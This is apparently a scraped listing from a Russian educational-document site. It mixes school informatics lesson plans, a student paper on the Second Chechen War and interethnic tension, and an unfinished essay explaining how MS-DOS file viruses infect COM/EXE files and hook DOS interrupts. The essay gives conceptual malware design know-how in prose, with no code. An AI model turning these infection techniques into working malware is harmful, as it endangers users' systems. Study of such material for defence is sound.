-развитие внимания, зрительной и слуховой памяти, логического мышления, умения представлять информацию различными способами , умение адекватно оценивать свои успехи
Коммуникативные:
- развитие диалогической речи
7
Компьютерный практикум
( 3 балла)
Выполни задание на компьютере
Работают с файлом «Логические рассуждения »
Личностные:
- формирование умения использовать программное обеспечение для обработки информации
8
Итоги урока, рефлексия
Можете ли вы назвать тему урока?
- Вам было легко или были трудности?
- Что у вас получилось лучше всего и без ошибок?
- Какое задание было самым интересным и почему?
- Как бы вы оценили свою работу?
Критерии:
1 - 3 балла – оценка «3»
4 - 5 баллов за урок – оценка «4»
6 и более баллов – оценка «5» .
Работа с дневниками
Личностные УУД:
-рефлексия способов и условий
действия, контроль и оценка процесса
и результатов деятельности |
https://doc4web.ru/informatika/urok-informatiki-dlya-klassa-po-teme-sozdanie-kollazha-v-potosop.html | Урок информатики для 10 класса по теме «Создание коллажа в Photoshop» | https://doc4web.ru/uploads/files/26/dd0906580856b748ccfae5400ea8c379.doc | files/dd0906580856b748ccfae5400ea8c379.doc | null |
https://doc4web.ru/informatika/urok-informatiki-dlya-klassa-sozdanie-dvizhuschihsya-izobrazheni.html | Урок информатики для 5 класса "Создание движущихся изображений" | https://doc4web.ru/uploads/files/34/a34081bf5c9dd0678624c8a1638fdbee.docx | files/a34081bf5c9dd0678624c8a1638fdbee.docx | Технологическая карта урока. Босова Л.Л. Информатика . 5 класс. ФГОС.
Урок 30. Создание движущихся изображений.
Планируемые учебные результаты:
предметные – формирование навыков работы с редактором презентаций;
метапредметные – умение планировать пути достижения целей; соотносить свои действия с планируемыми результатами; осуществлять контроль своей деятельности; определять способы действий в рамках предложенных условий; корректировать свои действия в соответствии с изменяющейся
ситуацией; оценивать правильность выполнения поставленной задачи; ИКТ компетентность личностные – понимание роли информационных процессов в современном мире;
личностные – понимание роли информационных процессов в современном мире.
Решаемые учебные задачи:
1) закрепить навыки обработки графической информации;
2) закрепить навыки планирования последовательности действий;
3) закрепить умения работы в редакторе презентаций.
Этапы урока
Материал ведения урока
Деятельность учащихся
УУД на этапах урока
1
Организационный момент
Дети рассаживаются по местам. Проверяют наличие принадлежностей.
Личностные УУД:
- формирование навыков самоорганизации
- формирование навыков письма
2
Запись домашнего задания.
§ 12 (8) Учебник С. 98 №21
(на листочке), карточка
Работа с дневниками
3
Проверка домашней работы на уроке не проводится.
§ 12 (задача 2), карточка
Задание подробно разбирается вместе с учителем
Личностные УУД:
- развитие грамотной речи, памяти
4
Повторение пройденного( за верный ответ – 1 балл)
- назови правила обработки информации:
- сортировка по возрастанию, сортировка по алфавиту, классификация, кодирование, формула, порядок действий, логические рассуждения.
5
Формулирование темы и целей урока через повторение( за верный ответ – 1 балл)
Мы вспомнили и назвали различные способы обработки информации. А сейчас посмотрите и скажите, как обработана графическая информация, представленная на экране?
- Да, графическую информацию можно обработать так, чтобы получилась движущаяся картинка. Поэтому тема урока:
- назовите задачи урока:
- обработана так, что изображения движутся, т.е это анимация.
- «Создание движущихся изображений»;
- узнать, как создаются движущиеся изображения; научиться создавать движущиеся изображения с помощью компьютерных программ.
Регулятивные:
- развитие умения формулировать тему и цель урока в соответствии с задачами и нормами русского языка
Личностные:
- развитие логического мышления, познавательной активности
5
Объяснение темы + работа в парах( 3 балла – если нет ошибок, 2 балла – если 1 ошибка, 1 балл – если 2 ошибки, 0 баллов – если 3 и более ошибки)
- выполним первую задачу: узнаем о создании движущихся изображений побольше;
- смотрят видео фрагмент;
Познавательные УУД:
- формирование представлений о создании движущихся изображений
Личностные:
-развитие внимания, зрительной и слуховой памяти, алгоритмического мышления, умение адекватно оценивать свои успехи
Коммуникативные:
- развитие диалогической речи
7
Компьютерный практикум
( 3 балла)
Выполним вторую задачу урока – научимся создавать движущиеся изображения с помощью компьютера:
- ПР. №17 ( по распечатке)
( По учебнику слишком большой объем.)
В папку «Заготовки добавить файлы «Фон», «Рыба», «Осьминог»)
Личностные:
- формирование умения использовать программное обеспечение для обработки информации
8
Итоги урока, рефлексия
Можете ли вы назвать тему урока?
- Вам было легко или были трудности?
- Что у вас получилось лучше всего и без ошибок?
- Какое задание было самым интересным и почему?
- Как бы вы оценили свою работу?
Критерии:
1 - 3 балла – оценка «3»
4 - 5 баллов за урок – оценка «4»
6 и более баллов – оценка «5» .
Работа с дневниками
Личностные УУД:
-рефлексия способов и условий
действия, контроль и оценка процесса
и результатов деятельности |
https://doc4web.ru/informatika/urok-informatiki-dlya-klassa-po-teme-proekt-kalkulyator.html | Урок информатики для 9 класса по теме "проект «Калькулятор»" | https://doc4web.ru/uploads/files/22/ce5bf0cfab46acf0e6bdefe47579d46b.doc | files/ce5bf0cfab46acf0e6bdefe47579d46b.doc | null |
https://doc4web.ru/informatika/urok-po-teme-informaciya-i-eyo-kodirovanie.html | Урок по теме «Информация и её кодирование» | https://doc4web.ru/uploads/files/27/6d4082861f97c445635f820dc5d7e19d.doc | files/6d4082861f97c445635f820dc5d7e19d.doc | null |
https://doc4web.ru/informatika/urok-informatiki-graficheskiy-redaktor-paint-klass.html | Урок информатики "Графический редактор Paint" 5 класс | https://doc4web.ru/uploads/files/2/8a09e28e8012ccee79d37f9760e98e6d.doc | files/8a09e28e8012ccee79d37f9760e98e6d.doc | null |
https://doc4web.ru/istoriya/arhitektura-alekseya-stepanovicha-kunichyova-kak-svyazuyuschee-z.html | Архитектура Алексея Степановича Куничёва, как связующее звено между прошлым и будущим города Валуйки | https://doc4web.ru/uploads/files/1/56943be540355ee04201bdec618b37d3.doc | files/56943be540355ee04201bdec618b37d3.doc | null |
https://doc4web.ru/istoriya/nacionalniy-vopros-v-sovremennoy-rossii-vtoraya-chechenskaya-voy.html | Национальный вопрос в современной России. Вторая чеченская война | https://doc4web.ru/uploads/files/150/da5c1ea4edec8da757324666c0393cc1.docx | files/da5c1ea4edec8da757324666c0393cc1.docx | Московский государственный институт международных отношений
(Университет) МИД России
Кафедра Международной Журналистики
Информационно-аналитическая справка по современной политической истории России (1985 - 2007)
Тема: «Национальный вопрос в современной России. Вторая чеченская война»
Выполнил: Слушатель факультета
Базовой подготовки,
3-й академической
группы Луговой С.Д.
Научный руководитель:
к.и.н., доцент Монин С.М.
Москва - 2007
План
Введение
1. Причины возникновения межнациональных конфликтов
2. Вторая чеченская война
2.1 Начало чеченского кризиса
2.2 Правление масхадовского режима
2.3 Чечня – база международного терроризма
2.4 Начало второй чеченской кампании
2.5 Последствия конфликта
Вывод
Библиография
Введение
В современном мире, где термин «международный терроризм» прочно вошел в обиход, и где вооруженные столкновения вспыхивают повсеместно, тема конфликтов, являются ли они социальными, политическими, или какими-либо еще, очень важна. В России, которая всегда была многонациональной страной, были и остаются актуальными отношения между различными народами, населяющими ее огромную территорию. Однако национальный вопрос в современной России мало исследован, так как данной проблемой стали серьезно заниматься лишь только после распада СССР.
Межнациональные конфликты, наряду с международным терроризмом, а часто второе как следствие первых, являются на сегодняшний день важнейшей проблемой во всем мире, и, конечно, в России. Северо-Кавказский регион, Чечня, политический конфликт в которой давно вышел за рамки только политического, беженцы, легальные и нелегальные мигранты из стран СНГ, особенно из кавказских стран и Центральной Азии – все это открытые очаги конфликтов.
Москва, как огромный мегаполис с миллионным населением, в первую очередь сталкивается с проблемой незаконных мигрантов, так называемых «гастрбайтеров», людей, которые приезжают в надежде заработать или хотя бы пожить лучше. В первую очередь, в Москву едут жители республик бывшего советского союза. Чаще всего приезжают из экономически слаборазвитых – Молдавии, Узбекистана, Туркменистана; из стран, где до сих пор не утихли военные конфликты – Таджикистана, Армении, Грузии и т.д. Естественно, что приезжие сталкиваются в городе с многочисленными проблемами. И наряду с жильем, регистрацией, работой немаловажным становится и вопрос взаимоотношения со скинхедами, который зачастую становится «игрой на выживание". Со скинхедами сталкиваются не только «гастрбайтеры», но и люди других национальностей, которые по тем или иным причинам живут в Москве. Неудивительно, что и многим студентам нашего института приходится сталкиваться с этой проблемой. Погромы на рынках, избиение людей, нападение на дипломатов, убийство таджикской девочки и студента-вьетнамца в Санкт Петербурге – уже не первые и очень тревожные сигналы о том, что конфликт давно вышел за рамки идеологического (каким он, в принципе, и побыть-то не успел). Типичные черты урбанизированного общества: перенаселенность, скученность, социальная несправедливость, неравенство, нестабильность, сложность социальных организаций – ведут к возникновению социально-психологического напряжения у многих людей. Постепенно накапливаясь, оно выливается в групповые взрывы агрессии, что особенно характерно для рассматриваемых нами межнациональных конфликтов. Примером могут служить недавние ситуации в Кондопоге и Олонце, где возник конфликт между чеченцами и русскими.
1. Причины возникновения межнациональных конфликтов
Как уже было сказано выше, кроме нелегальных мигрантов, со скинхедами сталкиваются и представители других социальных кругов – различных диаспор, проживающие в Москве и других крупных городах России. Проблема национальных диаспор является, и новой для России, и чрезвычайно важной. Это, с одной стороны, проблема нерусских диаспор и социальные конфликты с россиянами на территории РФ, а с другой стороны, проблема русских диаспор на территории других государств. Миллионы советских людей, проживающих на территории РФ, до распада СССР считали себя украинцами, грузинами, армянами, латышами и т.д. После образования на их территориях независимых и нередко националистических государств они с формальной точки зрения стали некоренными. Но психологически и культурно считают себя частью россиян: их предки жили в России, участвовали в развитии российского государства и общества, делили вместе с ним успехи и невзгоды.
В советской России проблемы национальных диаспор не было: все они имели свои национальные республики. Теперь наша страна столкнулась с ней лицом к лицу. Интеграция многочисленных (особенно в Москве) диаспор в духовную, политическую, экономическую жизнь России, увеличение численности чеченской, азербайджанской, армянской и других диаспор ставит ее в повестку дня центрального и регионального руководства России. В местах компактного проживания иноязычного населения (Москва, Петербург и др.) периодически возникают конфликтные ситуации и социальная напряженность.
Для инонациональных диаспор России главными являются проблемы, которые раньше, в советское время, не существовали: сохранение собственного языка, традиций, культуры, представительство в органах власти, бизнесе и т.д. Сейчас это внутреннее дело этих диаспор, которое решается не всегда правовым способом, что стимулирует развитие криминогенной ситуации в стране. Существует неявная практика отказа людям другой национальности в приеме на работу, в организации бизнеса, в преследовании в случае криминальной разборки и т.п.
С древнейших времен диаспоры играли большую роль в развитии обществ. Представители диаспор находятся на чужой земле, поиски безопасности вызывают у них повышенное стремление к успеху и личным достижениям. При этом они меньше коренных жителей считаются с существующими традициями и предубеждениями, ограничивающими их активность. «Чужаки» не подчиняются новому окружению, а развивают в себе способности, о которых у себя на родине даже не подозревали. Они дополняют сложившееся на новой родине разделение труда и добиваются успеха. Известно, что большинство китайских кули, привезенных для работы на плантации Малайи, стали миллионерами. То же происходит в РФ с армянской, азербайджанской, чеченской и иными диаспорами: они становятся не только причиной новых социальных конфликтов, но и прогресса в экономике России.
Коренное население относится к эмигрантам с подозрением, так как в его сознании негативные последствия прогрессивных преобразований и разрушение привычных ценностей и стереотипов поведения связываются с деятельностью чужаков. Увеличение темпов формационного развития не позволяет коренному простонародью в своей массе адекватно к нему приспосабливаться, в отличие от эмигрантов, имеющих для этого значительно более сильные мотивы. Возникает ненависть к чужакам, более сильная, чем к "своим" олигархам. Поэтому не случайно требования национального достоинства, социального обеспечения, экономического развития часто направляются против эмигрантов, даже и российских. Миграцию не славянских этнических групп трудно скрыть. За прошедшие после распада Советского союза 14 лет миграция увеличилась. Диаспоры выросли, многие в 10 раз: грузинская с 25 до 70 тыс., армянская с 50 тыс. до 500 тыс., азербайджанская – почти до миллиона. В то же время (после распада СССР) в России формировалась новая общность – людей, считавших себя россиянами. При этом, несмотря на распад союза, Россия остается многонациональной страной. Автономные округа и республики ищут новые пути встраивания в систему страны.
2. Вторая чеченская война
2.1 Начало чеченского кризиса
Чеченский кризис - явление сложное, многофакторное. Многие из его составляющих сегодня пока еще трудно оценить объективно. Вообще у таких событий не может быть однозначного толкования, у каждого его участника своя правда. Вместе с тем нынешняя степень изученности проблемы позволяет сделать ряд выводов. Августовские события 1991 г. в Москве, последовавший затем распад СССР, предоставили многонациональному народу ЧИР уникальный шанс сменить режим коммунистической бюрократии на демократическую систему власти конституционным путем, определить посредством референдума статус республики, найти приемлемую форму взаимоотношений с РФ, тем самым постепенно обрести реальную экономическую и политическую самостоятельность в рамках обновленной федерации.
Однако такой вариант решения проблем власти и суверенитета, предложенный демократической общественностью Чечни, не устраивал определенные политические силы в Москве и в самой республике. В результате Дудаев и силы, стоявшие за ним, сделав ставку на капитал теневой экономики, радикализировав идею суверенитета, при поддержке маргинальных слоев населения, захватили власть.
В чеченских событиях отразились противоречивые социально-экономические и политические процессы. С одной стороны, исторически обоснованное стремление чеченского народа к самоопределению, с другой – борьба социальных низов за равенство и социальную справедливость. Трагедия Чечни состоит в том, что на волне общедемократического и национального движения к власти прорвалась маргинальная элита. В результате под флагом идеи национального возрождения, суверенитета был совершен очередной передел власти и собственности в корпоративных интересах.
Чеченский кризис возник в результате внутричеченского раскола в подходах к проблемам власти и собственности. Лидеры отдельных кланов и политических элит Чечни, отказавшись действовать согласованно во имя высших интересов нации, спровоцировали этот раскол и упустили шанс создания в Чечне полиэтнического правового гражданского общества. Этим и воспользовались античеченские силы, спровоцировав военный конфликт. С момента захвата власти Дудаевым и начала внутричеченского противостояния на конфликт влияли два фактора – внешний и внутренний. Первый связан с проблемой самоопределения чеченского народа, второй – с борьбой различных политических сил и кланов за власть и собственность в самой Чечне.
2.2 Правление масхадовского режима
27 января 1997 г. в Чечне состоялись президентские выборы, на которых победил А. Масхадов. За три года правления Масхадова в Чечне практически ничего не было сделано в плане восстановления экономики и социальной сферы. Республике угрожала экологическая и эпидемиологическая катастрофа. Обозначились признаки распада хозяйственных, культурных связей внутри социума. Из Чечни продолжался исход населения. По данным переписи 1989 г. население составляло 1270 тыс. человек, из них более 30% русских и русскоязычных. Перед началом второй чеченской кампании население Ичкерии не превышало 400 тысяч жителей (русских в Чечне осталось около 50 тыс. человек).
Для масхадовской Чечни были характерны, с одной стороны – нищета и деградация рядового населения, с другой – обогащение лидеров режима, “новых чеченцев” и главарей вооруженных банд. В Чечне «правил балом» криминалитет. На территории республики действовало 157 вооруженных группировок. Они поделили между собой основные источники доходов. Организованная преступность превратила республику в производителя, потребителя и торговца наркотиками, оружием и нефтепродуктами. В среднем за неделю происходило 60-70 преступлений, в том числе от 8 до 10 убийств. Похищение людей с целью выкупа приобрело характер преступной эпидемии.
2.3 Чечня – база международного терроризма
Чечня стала базой международного терроризма. На ее территории орудовали и продолжают орудовать сотни наемников из стран ближнего и дальнего зарубежья. Их деятельность финансируется зарубежными экстремистскими центрами. В Чечне были организованы и действовали ваххабитские центры по подготовке боевиков. В последнее время именно международные террористы и наемники доминируют в бандформированиях.
2.4 Начало второй чеченской кампании
В начале августа 1999 г. резко обострилась ситуация в горных районах Дагестана, граничащих с Чечней. Поход дагестанских и чеченских ваххабитов возглавили террористы Шамиль Басаев и Хаттаб. События приобрели характер широкомасштабных военных действий с применением сил и средств регулярной армии. Ставка ваххабитов на поддержку населения не оправдалась. Действия федеральных войск и руководства республики получили массовую поддержку народов Дагестана, которые восприняли действия ваххабитов как нападение со стороны чеченцев (и это притом, что банды, проникшие на территорию Дагестана, на 80% состояли из наемников). Ответственность за то, что случилось дальше, лежит на президенте Ичкерии Масхадове, который не занял внятной позиции и публично не осудил действия Басаева и Хаттаба.
К концу августа под напором федеральных войск ваххабиты ушли в Чечню. Однако уже 5 сентября вновь вторглись в Новалахский район Дагестана. По свидетельству Басаева, цель вторжения заключалась в отвлечении федеральных сил, штурмовавших в этот момент Карамахи и Чабанмахи. На этот раз ваххабиты рассчитывали на поддержку чеченцев-акинцев и обиженных, как они считали, республиканскими властями лакцев. Однако и эти расчеты не оправдались. Лидер лакцев Н. Хачилаев, оппозиционно настроенный к центральной власти, не решился поддержать ваххабитов. Он заявил, что не причастен к их действиям. Лидеры акинской общины также заявили о своей лояльности дагестанским властям.
Басаевский рейд в Дагестан и взрывы в Москве достигли главной цели – подготовили российское общественное мнение к вводу российских войск в Чечню.
Началась вторая чеченская кампания и, как результат, новый массовый исход из республики гражданского населения. Численность вынужденных переселенцев, нашедших прибежище, в основном, в Ингушетии, достигла 200 тысяч человек.
Военные действия изменили внутриполитическую ситуацию в Чечне. Перед угрозой поражения лидеры вооруженных группировок объединились, прекратив междоусобную борьбу. С другой стороны, сохранилось жесткое противостояние между ваххабитами и сторонниками традиционного ислама. Многие полевые командиры и религиозные авторитеты готовы замириться с Россией ради искоренения ваххабизма. Но главная особенность нынешней ситуации – это практически полное отсутствие поддержки незаконных вооруженных формирований населением.
2.5 Последствия конфликта
Самым тяжелым последствием войны стала массовая гибель людей, прежде всего, мирных граждан. В Чечне, по официальным данным, потери среди мирного населения составили: около 3 тыс. убитыми и свыше 4,5 тыс. ранеными. К последствиям войны следует отнести и нравственно-психологические раны, которые еще долго будут заживать как в чеченском, так и в российском обществе.
Материальные потери были велики. Многие села пострадали в результате бомбардировок, разрушена столица - Грозный. Бездействовала промышленность. Сильно пострадало сельское хозяйство. Большинство населения не имело постоянной работы. Чечню покинули наиболее образованные, трудоспособные, квалифицированные граждане - то есть та часть народа, которая представляет потенциал нации и воплощает ее надежду на будущее.
Характеризуя нынешнюю ситуацию в ЧР, важно отметить, что основные силы сепаратистов в Чечне разгромлены. Боевики не имеют ни сил, ни средств вести крупномасштабные боевые действия и перешли к тактике диверсионной войны и террора. Война в Чечне, в нынешней ее форме, стала своеобразным промыслом, бизнесом на человеческой крови.
Кредит доверия чеченцев к национал-радикалам полностью исчерпан. Они больше не желают быть подопытными кроликами для экспериментов международного терроризма, а хотят, как любая цивилизованная нация, иметь власть, обслуживающую нужды общества в рамках делегированных ей народом полномочий. Чеченцы могут и хотят почувствовать себя полноправными гражданами России, занять подобающее им место в едином федеративном правовом государстве – Российской Федерации.
Запад, на который продолжают делать ставку чеченские сепаратисты, должен осознать, что ресурсы внутреннего развития Чечни, связанного с политическим процессом, основанном на идеологии этнонационализма, исчерпаны. Чеченский народ в своем подавляющем большинстве отвергает идеологию ваххабизма и власть клептократии. Альтернативу вооруженному сепаратизму может предложить только та часть чеченского общества, которая хочет жить в России и с Россией. А Запад в отношении Чечни демонстрирует политику двойных стандартов. Чеченских беженцев страны Запада не принимают, гуманитарная помощь поступает в ограниченных размерах, зато боевики и их лидеры получают мощную материальную и моральную поддержку. Однако любому непредвзятому человеку ясно, что, только очистив Чечню от террористов и наемников, восстановив конституционный порядок, можно начать процесс возрождения и консолидации чеченской нации. Решающую роль в этом призваны сыграть сами чеченцы. Главное - начать процесс созидания, восстановления разрушенной экономики, социальной сферы и культуры и тем самым сделать войну невыгодной. Федеральные власти должны повернуться лицом к проблемам и нуждам беженцев, мирного населения Чечни.
Вывод
Национальный вопрос остается одним из важнейших и болезненных вопросов современной многонациональной России. В Чечне продолжается партизанская война, периодически происходят террористические акты, кавказские диаспоры зачастую занимаются нелегальным или криминальным бизнесом. Из-за этого люди с темной кожей, плохо говорящие по-русски и довольно богатые воспринимаются в центральной части России славянским населением как захватчики, враги и бандиты. В крупных городах нашей страны после распада СССР начали функционировать националистические организации, однако они не проводят никакой определенной политики, а только громят рынки и избивают лиц неславянской внешности, которые в большинстве случаев ни в чем не виновны. Практически ни одной многонациональной стране мира не удалось полностью решить данный вопрос. В США на протяжении 200 лет пытаются наладить отношения между белыми и афро-американцами; во Франции в 2005 году произошли массовые беспорядки, в которых приняло участие почти все арабское население страны; в России до сих пор не урегулирован чеченский конфликт, и вопрос нелегальных иммигрантов также остается открытым.
Библиография
Л.М. Дробижева «Социальные проблемы международных отношений в постсоветской России», М. Центр общечеловеческих ценностей
А.Н. Сахаров, А.Н. Боханов, В.А. Шестаков «История России с начала XIX века до начала XXI века» (стр. 845 - 847), издательство «Астрель», 2003 год
Н.М. Никулин «Курс современной политической истории России», часть 2 (стр. 293 – 298) издательство «МГИМО-Университет», 2006 год
2 |
https://doc4web.ru/informatika/zarazheniya-virusom-programmnih-faylov.html | Заражения вирусом программных файлов | https://doc4web.ru/uploads/files/124/7f9db7b35bb10aa77b721f56297f083f.docx | files/7f9db7b35bb10aa77b721f56297f083f.docx | Заражения вирусом программных файлов
ВВЕДЕHИЕ
Формально компьютерным вирусом называеся программа, которая может заражать другие программы путем включения в них своей, возможно модифицированной, копии, причем последняя сохраняет способность к дальнейшему размножению. Помимо заражения, вирус, подобно любой другой программе, может выполнять и другие несанкционированные действия, от вполне безобидных до крайне разрушительных.Выполняемые вирусом несанкционированые действия могут быть обусловлены наступлением определенной даты, или определенным количеством размножений, например записью зараженой программы на винчестер.При этом комбинация этих условий может быть достаточно сложной, чтобы затруднить ее определение.
Инфицируя программы, вирусы могут распространяться от одной программы к другой, что делает их более опасным по сравнению с другими методами компьютерного вандализма.Зараженные программы могут передаватрся через дискеты или по сети на другие ЭВМ. В связи с широко распространенной практикой обмена и передачи программ на дискетах среди пользователей ПЭВМ коичество зараженных программ может быть значительным, при - водя к своего рода эпидемиям.
ПРОЦЕСС ЗАРАЖЕHИЯ
Упрощенно процесс заражения вирусом программных файлов можно представить следующим образом.Код зараженной программы обычно вирус получил управление первым,до начала работы программы - вирусоносителя.
При передаче управления вирусу он каким-то способом находит новую программу и выполняет вставку собственной копии в начало или добавляет ее в конец этой обычно еще не зараженой программы. Если вирус дописывается в конец программы, то он то он корректирует код программы, чтобы получить управление первым.Для этого первые несколько байтов запоминаются в теле вируса, а на их место вставляется команда перечода на начало вируса. Этот способ является наиболее распространенным. По - лучив управление, вирус восстанавливает "спрятанные" первые байты, а после обработки своего тела передает управление программе - вирусоносителю и та нормально выполняет свои функции. Возможны случаи, когда вирус включает себя куда-то в середину программы, например в область стека. Последние случаи встречаются редко.
СТРУКТУРА КОМПЬЮТЕРHОГО ВИРУСА
Hаиболее распространенными типам компьтерных вирусов в MS DOS являются файловые нерезидентные,файловые резидентные и бутовые вирусы.Разбор анатомии компьютерных вируов начнем с анализа структуры нерезидентного файлового вируса как прос - тейшей разновидности этого класса системных программ.
Структрно компьютерный вирус можно представить состоящим из двух частей:головы и хвоста.Головой называется часть вируса, которая первой получает управление.Хвост вируса - это части вируса, расположенные отдельно от головы.В простейшем случае вирус может состоять из одной головы, и действительно файл - овые вирусы обычно так и устроены. Такие вирусы будем назы - вать несегментированными. В отличие от них сегментированные вирусы имеют распологающийся отдельно хвост и в какой - то мере аналогичны оверлейным программам. Примером сегментиро - ванных вирусов являются бутовые вирусы,хотя возможна реали - зация сегментированных файловых вирусов.
СТРУКТУРА ФАЙЛОВОГО HЕРИЗЕДЕHТHОГО ВИРУСА
Файловые вирусы являются наиболее распространенной разно - видностью компьтерных вирусов. Принципиально они заражают любой вид исполняемых файлов, существующих в MS DOS:com,exe, ovl и т.д. Однако основными объектами заражения являются соm и ехе - файлы. Hаиболее просто осуществляется заражение соm файлов, которые представляют собой почти точную копию участка памяти с загруженной программы. Единственая требуемая настройка при загрузке com - файлов состоит в загрузке сег - ментных регистров значениями, соответствующими месту загрузки программы. Значительная часть com - файлов начинается с команды перехода, обходящей содержащиеся в начале программ данные.
При заражении com - файлов вирус запоминает в своем теле первые три (или больше) байта программы и вместо них записывает переход на начало собственного кода.Так поступает большинство файловых вирусов, заражающих com - файлы, но не все. Дело в том, что при дописывании тела вируса в конец заражаемого файла весь код вируса должен быть написан спецальным образом, обычно называемым позиционно-независмым программированием:при выполнении программы все ссылки должны адресоваться через смещения, которое обычно хранится в одном из регистров.
Hекоторые вирусы используют более примитивный подход: вместо дописывания своего тела в конец зарожаемого com - файла они перемещают туда первые несколько блоков программы, а сами записываются на место освободившихся блоков. В этом случае только программа восстановления исходного состаяния програмы должна быть позиционно-независимой или размещаться где-то в фиксированных адресах памяти, используя какой-то неиспользуемый ее участок.
Вставка тела вируса при заражении может выполнятся не только в хвост файла. Встречаются случаи имплантации в начало или середину файла.
Вставка в начало файла. В этом случае первые блоки ( или все тело ) заражаемой программы обычно переписываются в конец, поэтому до передачи управления зараженной программе вирус должен предварительно переписать эти блоки на первоначальное место, заменив ими собственный код.С этой целью вирус должен переместить свое тело или хотя бы соответствующую часть своего кода таким образом, чтобы она не была затерта в процессе операции перезаписи. Hекоторые примитивные вирусы, записываясь в начало заражаемого файла,не сохраняют его содержимого. При этом естественно, зараженный файл уничтожается, а вирус, должен как-то замаскировать тот факт,что вызываемая программа является неработоспособной. Для этой цели иногда исполь - зуется какое-нибудь подходящее сообщение об ошибке.
Вствка в конец файла. Это наиболее распрастраненный сучай. При этом необходимо обеспечить передачу управления коду вируса до начала работы зараженной программы. Для файлов типа com чаще всего это реализуется заменой нескольких пер - вых байтов программы ( обычно трех на команду перехода ). При этом сами заменяемые байты обязательно должны быть сох - ранены где-то в теле вируса, что обеспечивает возможность их востановления. Когда инсталятор вируса получает управление, то обычно в начале своей работы он восстанавливает измененые вирусом байты в первоначальном виде.
Вставка в середину файла. Этот способ заражения встречается редко. Во-первых, этот способ используется вирусами поражающими особый класс программ, особенности структуры которого заранее известны,например только файл command.com.Во-вторых, и это наиболее частый случай, вставка в середину возможна путем перебрасывания замещаемых блоков в конец файла.В частном случае, когда заражаемый файл содержит область нолей или или других повторяющихся байт достаточного размера, вставка в середину происходит без увеличения длины программы, что затрудняет обнаружение зараженных файлов. Вставка в середину может произойти и случайно. Hапример это происходит для обычных вирусов, цепляющихся к концу exe-файла, если в загаловке неправильно указана его длина т.е. часть используемая в качестве буфера или неявного оверлея. В этом случае вирус считает, что файл имеет длину, указанную в заголовке,и записывает свой код в область буфера или оверлея. При этом он оказывается в середине действительно занимаемого данной программой файла.И наконец,файл может быть заражен несколькими вирусами, однотипно заражающими файл ( обычно дописывающими свой код в конец файла ). В этом случае вирус, первым заразившим данный файл, оттесняется к середине файла последующими вирусами. Являясь сравнительно редкими, указанные случаи довольно часто неучитываются создателями антивирусных программ, в частности детекторов и фагов, которое, увлекаясь оптимизацией времени выполнения своих программ, принимают " слишком сильные " допущения о расположении кода вируса в теле зараженной программы. В результате файл может быть не детектирован как зараженный или вылечен неправильно. Как уже указывалось, при вставке в конец или середину файла вирус должен каким - то образом обеспечить передачу себе управленияю. При этом необязательно изменять именно первые байты программы. Возможно изменение других байтов. Hапример, если программа начинается с команды безусловного перехода, вирус может определять адрес перехода и модифицировать команды, расположенные по этому адресу. Поэтому часто высказываемое мнение о том, что для нейтрализации вируса в зара - женном файле достаточно восстановить его первые байты, следует признать неверным.
СТРУКТУРА ФАЙЛОВОГО РЕЗИДЕHТHОГО ВИРУСА
Файловые резидентные вирусы, помимо отдельных файлов, зара - жают, если так можно выразится, и память компьютера. Преде - льно упрощая, память компьютера можно рассматривать как еще один файл, который можно заражать, дописываясь " в голову ", т.е. в область младших адресов свободного участка памяти, " в хвост ", т.е. в область старших адресов свободного уча - стка памяти, и, наконец , " в середину ", т.е. в область адресов уже используемых операционной системой или какойнибудь программой.
Вместе с тем структура резидентного вируса существенно отличается от структуры нерезедентного вируса.Резидентный вирус можно представлять как состоящий из двух относительно неза - висимых частей: инсталятора и модуля обработки прерываний. Последний,в свою очередь,состоит из ряда программ обработки. Hесколько упрощая, можно считать , что на каждое перехваты - ваемое прерывание приходится своя программа обработки.
Инсталятор получает управление при выполнении зараженной программы и играет роль своеобразной ракеты-носителя, запускающий вирус на орбиту, т.е. в оперативную память.Он отрабатывает один раз - после запуска зараженной программы ,и его целесообразно рассматривать как спецыализированный файловый вирус заражающий оперативную память
и, возможно, обычные файлы ( чаще всего commmand.com ). В последнем случае инсталятор фактически является доработанным для заражения оперативной памяти файловым вирусом.
После закрепления в оперативной памяти инсталятор выполняет так называемый перехват прерываний-обеспечивание передачи управления модулям вируса,обрабатывающим соответсвующее прерывание.Это может делаться "в лоб", т.е. путем использования соответствующих функций MS - DOS, или " с черного хода " - нестандартным способом,обеспечивающим в общем случае более высокую степень маскировки.При любом способе конечный эффект состоит в том, что при выполнении определеной функции MS-DOS управление будет передаваться вирусу .При этом вирус может содержать дополнительный механизм, обеспечивающий получение управления раньше других программ, перехвативших это же прерывание.Такие резидентные вирусы будем называть всплывающими.Всплытие помогает вирусу обходить простейшие программысторожа, основанные на перехвате тех же прерываний,поскольку они будут получать управление после вируса.
Отсюда следует, что анализ списка резидентных программ и объема памяти, сообщаемого MS - DOS,является весьма полезным способом проверки зараженности компьютера.
Функционирование резидентного файлового вируса можно пред - ставить как две стадии: инсталяции и слежения. При запуске зараженной программы управление получает инсталятор, который обеспечивает зукрепление вируса в оперативной памяти, перехват требуемых прерываний и, возможно,маскировку(с целью затруднить свое обнаружение среди резидентных программ). Эта фаза работы называется фаза инсталяции. В дальнейшем каждый раз при возникновении одного из перехваченных вирусом прерываний управление получает модуль обработки соотвествующего прерывания. При этом вирус может анализировать поступивший запрос и в зависимости от его вида выполнять те или иные действия.Hапример, в MS-DOS загрузка программы в оперативную память (с последующим выполнением и без оного) реализовано с помощью функции 4Bh прерывания 21h (Exec). Если вирус перехватывает прерывание 21h,то контролируя эту функцию,он может определить имя файла, из которого выполняется загрузка. Тем самым появляется возможность заразить программу в этом фай - ле. Отсюда видно, что обычно способ поиска "жертвы" у рези - дентных вирусов отличается от способа, используемого нерезидентными вирусами.Hерезидентные вирусы получают управление после заруски в память зарженной программы, а затем ищут файл-жертву, используя параметры PATH или другую информацию о расположении выполняемых программ. Если жертва найдена, то она заражается,а затем управление возвращается зараженной программе. Резидентные вирусы получают управление при выполнении определенных Функций MS-DOS. Как правило, это функции обслуживания файловой системы.Получив управление при обращении программы к определенной функции,они определяют контекст этого обращения (имя файла, соответсвующего выполняемой программе), а затем выполняют над этим файлом определеные дей - ствия ( например, заражение ). Обычно резидентные файловые вирусы заражают программы при их запуске на выполнение (по функции 4Bh прерывания 21h), однако наиболее инфицирующие из резидентных вирусов заражают файлы при их открытии, чтении и других операциях.
СТРУКТУРА БУТОВОГО ВИРУСА
